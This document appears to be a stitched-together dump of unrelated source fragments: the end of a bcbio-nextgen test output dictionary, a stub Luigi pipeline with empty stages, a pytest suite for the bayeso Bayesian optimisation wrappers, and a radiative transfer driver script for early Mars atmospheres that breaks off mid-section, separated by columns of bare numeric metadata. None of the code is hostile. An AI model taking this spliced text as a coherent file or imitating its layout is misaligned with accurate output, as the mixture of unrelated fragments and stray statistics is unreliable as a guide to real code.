'reference': {'fasta': {'base': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa'},
'genome_context': ['/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test.bed.gz',
'/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test2.bed.gz'],
'rtg': '/bcbio-nextgen/tests/data/genomes/hg19/rtg/hg19.sdf',
'star': {'indexes': ['/bcbio-nextgen/tests/data/genomes/hg19/star/chrLength.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/sjdbList.out.tab',
'/bcbio-nextgen/tests/data/genomes/hg19/star/SA',
'/bcbio-nextgen/tests/data/genomes/hg19/star/Genome',
'/bcbio-nextgen/tests/data/genomes/hg19/star/SAindex',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrStart.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrName.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrNameLength.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/genomeParameters.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/Log.out']}},
'resources': {},
'rgnames': {'lane': 'Test1',
'lb': None,
'pl': 'illumina',
'pu': 'Test1',
'rg': 'Test1',
'sample': 'Test1'},
'sam_ref': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa',
'transcriptome_bam': None,
'upload': {'dir': '/bcbio-nextgen/tests/test_automated_output/upload',
'run_id': ''},
'work_bam': '/bcbio-nextgen/tests/test_automated_output/align/Test1/Test1_star/Test1.bam'}]]
| 52.94332
| 145
| 0.522826
| 1,261
| 13,077
| 5.289453
| 0.164948
| 0.151124
| 0.214093
| 0.201499
| 0.832534
| 0.815292
| 0.795802
| 0.763418
| 0.763418
| 0.750225
| 0
| 0.040013
| 0.31391
| 13,077
| 246
| 146
| 53.158537
| 0.703411
| 0
| 0
| 0.438525
| 0
| 0.07377
| 0.57062
| 0.406668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a5103818918178054e89e2f1e45e4a4e9274ca84
| 986
|
py
|
Python
|
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | null | null | null |
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | null | null | null |
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | 1
|
2019-12-01T22:42:52.000Z
|
2019-12-01T22:42:52.000Z
|
#!/usr/bin/env python3
import luigi
import json
class Stage0(luigi.Task):
input_file = luigi.Parameter()
def requires(self):
return
def output(self):
return
def run(self):
return
class Stage1(luigi.Task):
input_file = luigi.Parameter()
def requires(self):
return
def output(self):
return
def run(self):
return
class Stage2(luigi.Task):
input_file = luigi.Parameter()
def requires(self):
return
def output(self):
return
def run(self):
return
class Stage3(luigi.Task):
input_file = luigi.Parameter()
def requires(self):
return
def output(self):
return
def run(self):
return
class Stage4(luigi.Task):
input_file = luigi.Parameter()
def requires(self):
return
def output(self):
return
def run(self):
return
if __name__=="__main__":
luigi.run()
| 15.40625
| 34
| 0.570994
| 113
| 986
| 4.867257
| 0.230089
| 0.272727
| 0.236364
| 0.163636
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0
| 0.009077
| 0.329615
| 986
| 63
| 35
| 15.650794
| 0.822995
| 0.021298
| 0
| 0.795455
| 0
| 0
| 0.008316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.340909
| false
| 0
| 0.045455
| 0.340909
| 0.954545
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
eb5ef5c9cd4af15d249d14b5c048fdeb73375c19
| 9,371
|
py
|
Python
|
tests/common/test_wrappers_bo_function.py
|
jungtaekkim/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 76
|
2018-01-18T03:03:14.000Z
|
2022-02-07T06:41:41.000Z
|
tests/common/test_wrappers_bo_function.py
|
POSTECH-CVLab/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 20
|
2018-06-29T16:48:03.000Z
|
2021-04-19T00:30:57.000Z
|
tests/common/test_wrappers_bo_function.py
|
POSTECH-CVLab/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 4
|
2020-01-07T06:24:17.000Z
|
2021-06-11T06:21:42.000Z
|
#
# author: Jungtaek Kim (jtkim@postech.ac.kr)
# last updated: July 9, 2021
#
"""test_wrappers_bo_function"""
import typing
import pytest
import numpy as np
from bayeso import bo
from bayeso.wrappers import wrappers_bo_function as package_target
def test_run_single_round_with_all_initial_information_typing():
annos = package_target.run_single_round_with_all_initial_information.__annotations__
assert annos['model_bo'] == bo.BO
assert annos['fun_target'] == typing.Callable
assert annos['X_train'] == np.ndarray
assert annos['Y_train'] == np.ndarray
assert annos['num_iter'] == int
assert annos['str_sampling_method_ao'] == str
assert annos['num_samples_ao'] == int
assert annos['str_mlm_method'] == str
assert annos['return'] == typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]
def test_run_single_round_with_all_initial_information():
np.random.seed(42)
arr_range = np.array([
[-5.0, 5.0],
])
dim_X = arr_range.shape[0]
num_X = 3
num_iter = 10
X = np.random.randn(num_X, dim_X)
Y = np.random.randn(num_X, 1)
fun_target = lambda x: 2.0 * x + 1.0
model_bo = bo.BO(arr_range)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(1, fun_target, X, Y, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, 1, X, Y, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, 1, Y, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, 1, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, Y, 'abc')
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, np.random.randn(num_X), Y, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, np.random.randn(num_X), num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, np.random.randn(2, dim_X), Y, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, np.random.randn(num_X, 2), num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, Y, num_iter, str_sampling_method_ao=1)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, Y, num_iter, str_sampling_method_ao='abc')
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, Y, num_iter, num_samples_ao='abc')
X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = package_target.run_single_round_with_all_initial_information(model_bo, fun_target, X, Y, num_iter)
assert len(X_final.shape) == 2
assert len(Y_final.shape) == 2
assert len(time_all_final.shape) == 1
assert len(time_surrogate_final.shape) == 1
assert len(time_acq_final.shape) == 1
assert X_final.shape[1] == dim_X
assert X_final.shape[0] == Y_final.shape[0] == num_X + num_iter
assert time_all_final.shape[0] == num_iter
assert Y_final.shape[1] == 1
assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
def test_run_single_round_with_initial_inputs_typing():
annos = package_target.run_single_round_with_initial_inputs.__annotations__
assert annos['model_bo'] == bo.BO
assert annos['fun_target'] == typing.Callable
assert annos['X_train'] == np.ndarray
assert annos['num_iter'] == int
assert annos['str_sampling_method_ao'] == str
assert annos['num_samples_ao'] == int
assert annos['str_mlm_method'] == str
assert annos['return'] == typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]
def test_run_single_round_with_initial_inputs():
np.random.seed(42)
arr_range = np.array([
[-5.0, 5.0],
])
dim_X = arr_range.shape[0]
num_X = 3
num_iter = 10
X = np.random.randn(num_X, dim_X)
fun_target = lambda x: x**2 - 2.0 * x + 1.0
model_bo = bo.BO(arr_range)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(1, fun_target, X, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, 1, X, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, 1, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, X, 1.2)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, np.random.randn(num_X), num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, X, num_iter, str_sampling_method_ao=1)
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, X, num_iter, str_sampling_method_ao='abc')
with pytest.raises(AssertionError) as error:
package_target.run_single_round_with_initial_inputs(model_bo, fun_target, X, num_iter, num_samples_ao='abc')
X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = package_target.run_single_round_with_initial_inputs(model_bo, fun_target, X, num_iter)
assert len(X_final.shape) == 2
assert len(Y_final.shape) == 2
assert len(time_all_final.shape) == 1
assert len(time_surrogate_final.shape) == 1
assert len(time_acq_final.shape) == 1
assert X_final.shape[1] == dim_X
assert X_final.shape[0] == Y_final.shape[0] == time_all_final.shape[0] == num_X + num_iter
assert Y_final.shape[1] == 1
assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
def test_run_single_round_typing():
annos = package_target.run_single_round.__annotations__
assert annos['model_bo'] == bo.BO
assert annos['fun_target'] == typing.Callable
assert annos['num_init'] == int
assert annos['num_iter'] == int
assert annos['str_sampling_method_ao'] == str
assert annos['num_samples_ao'] == int
assert annos['str_mlm_method'] == str
assert annos['seed'] == typing.Union[int, type(None)]
assert annos['return'] == typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]
def test_run_single_round():
np.random.seed(42)
arr_range = np.array([
[-5.0, 5.0],
])
dim_X = arr_range.shape[0]
num_X = 3
num_iter = 10
fun_target = lambda x: x**2 - 2.0 * x + 1.0
model_bo = bo.BO(arr_range, debug=True)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(1, fun_target, num_X, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, 1, num_X, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, 1.2, num_iter)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, 1.2)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_initial_method_bo=1)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_initial_method_bo='abc')
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_initial_method_bo='grid')
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_sampling_method_ao=1)
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_sampling_method_ao='abc')
with pytest.raises(AssertionError) as error:
package_target.run_single_round(model_bo, fun_target, num_X, num_iter, seed=1.2)
X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = package_target.run_single_round(model_bo, fun_target, num_X, num_iter, str_initial_method_bo='uniform')
assert len(X_final.shape) == 2
assert len(Y_final.shape) == 2
assert len(time_all_final.shape) == 1
assert len(time_surrogate_final.shape) == 1
assert len(time_acq_final.shape) == 1
assert X_final.shape[1] == dim_X
assert X_final.shape[0] == Y_final.shape[0] == time_all_final.shape[0] == num_X + num_iter
assert Y_final.shape[1] == 1
assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
| 50.654054
| 180
| 0.74197
| 1,465
| 9,371
| 4.379522
| 0.060751
| 0.058915
| 0.091646
| 0.123441
| 0.956359
| 0.951995
| 0.946384
| 0.940461
| 0.922849
| 0.903834
| 0
| 0.014134
| 0.154413
| 9,371
| 184
| 181
| 50.929348
| 0.795558
| 0.010244
| 0
| 0.658385
| 0
| 0
| 0.033564
| 0.007123
| 0
| 0
| 0
| 0
| 0.521739
| 1
| 0.037267
| false
| 0
| 0.031056
| 0
| 0.068323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8080ca016d89fd596bd2ca83cf64aee487c36e
| 16,248
|
py
|
Python
|
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | 1
|
2017-12-14T03:48:22.000Z
|
2017-12-14T03:48:22.000Z
|
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | null | null | null |
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-1 -*-
"""
Purpose of this file is to run the uv_radtrans function from radiativetransfer.py to generate the surface radiance calculations used to derive the results in our paper.
This script: run for the Mars-approximate case (A=desert)
"""
import radiativetransfer as rt
import numpy as np
import pdb
##################################
###First, validation cases
##################################
####Replicate Rugheimer+2015 3.9 Ga young Earth calculation.
#rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='rugheimer_earth_epoch0', outputfilelabel='reproduce_rugheimer', inputspectrafile='general_youngsun_earth_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=60., albedoflag='uniformalbedo',uniformalbedo=0.2, includedust=False, includeco2cloud=False,includeh2ocloud=False)
##Replicate Rugheimer+2015 3.9 Ga young Earth calculation using Rugheimer cross-sections
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='rugheimer_earth_epoch0', outputfilelabel='reproduce_rugheimer_rugheimerXCs', inputspectrafile='general_youngsun_earth_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=60., albedoflag='uniformalbedo',uniformalbedo=0.2, includedust=False, includeco2cloud=False,includeh2ocloud=False) ###NEED TO UNCOMMENT RUGHEIMER XCs BLOCK IN CODE -- BE SURE TO RECOMMEND AFTERWARDS
#####Replicate Wuttke+2006 surface radiance measurement calculation
#rt.uv_radtrans(z_upper_limit=60.e5, z_step=60.e3, inputatmofilelabel='wuttke2006', outputfilelabel='reproduce_wuttke2006', inputspectrafile='modernsun_earth_wuttke2006.dat',TDXC=False, DeltaScaling=False, SZA_deg=51.2, albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,0.,0.,1.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#######################################################################################################################
#CO2-H2O Atmosphere (no clouds/dust)
#######################################################################################################################
#################
####Particulate-free atmospheres, no TDXC, no delta-scaling, variable P_0 and T_0, SZA=0, A=desert
#################
inputatmofilelabel_elt_list=np.array(['colddrymars_0.02bar_210K', 'colddrymars_0.02bar_250K', 'colddrymars_0.02bar_300K', 'colddrymars_0.2bar_210K', 'colddrymars_0.2bar_250K', 'colddrymars_0.2bar_300K','colddrymars_2bar_210K', 'colddrymars_2bar_250K', 'colddrymars_2bar_300K'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#################
####Particulate-free atmospheres, T_0=200, P_0=2e-5-2e-3, SZA=0, A=desert, with and without TD XCs
#################
inputatmofilelabel_elt_list=np.array(['colddrymars_0.00002bar_200K', 'colddrymars_0.0002bar_200K', 'colddrymars_0.002bar_200K'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
#Without TDXCs:
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#with TDXCs
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_TD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=True, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#########################################################################################################################
###CO2-H2O Atmosphere (clouds)
#########################################################################################################################
##################
#####Atmospheres with H2O and CO2 clouds, T_0=250, P_0=0.02, SZA=0, A=desert, no TDXCs, yes delta scaling
##################
cloudtaulabel_list=np.array(['0.1', '1', '10', '100', '1000', '10000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([0.1, 1., 10., 100., 1000., 10000.]) #list of cloud optical depths (500 nm)
for ind in range(0, len(cloudtaulabel_list)):
cloudtaulabel=cloudtaulabel_list[ind]
cloudtauvalue=cloudtauvalue_list[ind]
#H2O Clouds
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_h2ocloudod='+cloudtaulabel+'_z=3.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=True,h2ocloudlayerinds=np.array([60]), h2ocloudlayerods=np.array([cloudtauvalue]),h2oiceparamsfile='cloud_h2o_reff10_vareff0p1_lognormal.pickle')
##CO2 Clouds
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
#########################################################################################################################
###CO2-H2O-SO2/H2S atmospheres. No particulate, no TDXC, no delta-scaling, T_0=250, pCO2=0.02-2bar, SZA=0, A=fresh snow
#########################################################################################################################
#################
###SO2 (pSO2=2e-9 -- 2e-5 bar for pCO2=2e-2-2 bar)
#################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_100ppbso2_0h2s', 'volcanicmars_0.02bar_250K_1ppmso2_0h2s', 'volcanicmars_0.02bar_250K_10ppmso2_0h2s', 'volcanicmars_0.02bar_250K_100ppmso2_0h2s', 'volcanicmars_0.02bar_250K_1000ppmso2_0h2s','volcanicmars_0.2bar_250K_10ppbso2_0h2s', 'volcanicmars_0.2bar_250K_100ppbso2_0h2s', 'volcanicmars_0.2bar_250K_1ppmso2_0h2s', 'volcanicmars_0.2bar_250K_10ppmso2_0h2s', 'volcanicmars_0.2bar_250K_100ppmso2_0h2s','volcanicmars_2bar_250K_1ppbso2_0h2s', 'volcanicmars_2bar_250K_10ppbso2_0h2s', 'volcanicmars_2bar_250K_100ppbso2_0h2s', 'volcanicmars_2bar_250K_1ppmso2_0h2s', 'volcanicmars_2bar_250K_10ppmso2_0h2s'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=False)
#################
###H2S (pH2S=2e-9 -- 2e-4 bar for pCO2=2e-2-2 bar)
#################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_0so2_100ppbh2s', 'volcanicmars_0.02bar_250K_0so2_1ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10ppmh2s', 'volcanicmars_0.02bar_250K_0so2_100ppmh2s', 'volcanicmars_0.02bar_250K_0so2_1000ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10000ppmh2s', 'volcanicmars_0.2bar_250K_0so2_10ppbh2s', 'volcanicmars_0.2bar_250K_0so2_100ppbh2s', 'volcanicmars_0.2bar_250K_0so2_1ppmh2s', 'volcanicmars_0.2bar_250K_0so2_10ppmh2s', 'volcanicmars_0.2bar_250K_0so2_100ppmh2s', 'volcanicmars_0.2bar_250K_0so2_1000ppmh2s', 'volcanicmars_2bar_250K_0so2_1ppbh2s', 'volcanicmars_2bar_250K_0so2_10ppbh2s', 'volcanicmars_2bar_250K_0so2_100ppbh2s', 'volcanicmars_2bar_250K_0so2_1ppmh2s', 'volcanicmars_2bar_250K_0so2_10ppmh2s', 'volcanicmars_2bar_250K_0so2_100ppmh2s'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=False)
#########################################################################################################################
###CO2-H2O-SO2/H2S atmospheres. CO2 clouds @ 20-21 km (variable thickness), no TDXC, no delta-scaling, T_0=250, P_0=0.02, SZA=0, A=fresh snow
#########################################################################################################################
##################
####SO2 (pSO2=2e-9 -- 2e-5 bar for pCO2=2e-2 bar, CO2 cloud OD=1-1000)
##################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_100ppbso2_0h2s', 'volcanicmars_0.02bar_250K_1ppmso2_0h2s', 'volcanicmars_0.02bar_250K_10ppmso2_0h2s', 'volcanicmars_0.02bar_250K_100ppmso2_0h2s', 'volcanicmars_0.02bar_250K_1000ppmso2_0h2s'])
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
for ind in range(0, len(cloudtaulabel_list)):
cloudtaulabel=cloudtaulabel_list[ind]
cloudtauvalue=cloudtauvalue_list[ind]
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
##################
####H2S (pSO2=2e-9 -- 2e-4 bar for pCO2=2e-2 bar, CO2 cloud OD=1-1000)
##################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_0so2_100ppbh2s', 'volcanicmars_0.02bar_250K_0so2_1ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10ppmh2s', 'volcanicmars_0.02bar_250K_0so2_100ppmh2s', 'volcanicmars_0.02bar_250K_0so2_1000ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10000ppmh2s'])
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
for ind in range(0, len(cloudtaulabel_list)):
cloudtaulabel=cloudtaulabel_list[ind]
cloudtauvalue=cloudtauvalue_list[ind]
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
#########################################################################################################################
###CO2-H2O atmospheres. Varying levels of exponentially distributed dust, no TDXC, no delta-scaling, T_0=250, P_0=0.02, SZA=0, A=fresh snow
#########################################################################################################################
##################
####Just dust (tau_d=0.01-10, pCO2=2e-2--2 bar)
##################
inputatmofilelabel_elt_list=np.array(['colddrymars_0.02bar_250K','colddrymars_0.2bar_250K','colddrymars_2bar_250K'])
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
for ind in range(0, len(dusttaulabel_list)):
dusttaulabel=dusttaulabel_list[ind]
dusttauvalue=dusttauvalue_list[ind]
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel, inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=False, includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
##################
####Dust and clouds (Varying tau_d and tau_cloud)
##################
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for ind_dust in range(0, len(dusttaulabel_list)):
for ind_cloud in range(0, len(cloudtaulabel_list)):
dusttaulabel=dusttaulabel_list[ind_dust]
dusttauvalue=dusttauvalue_list[ind_dust]
cloudtaulabel=cloudtaulabel_list[ind_cloud]
cloudtauvalue=cloudtauvalue_list[ind_cloud]
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel+'_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle', includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
##################
####Dust and clouds (varying tau_d and cloud position)
##################
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
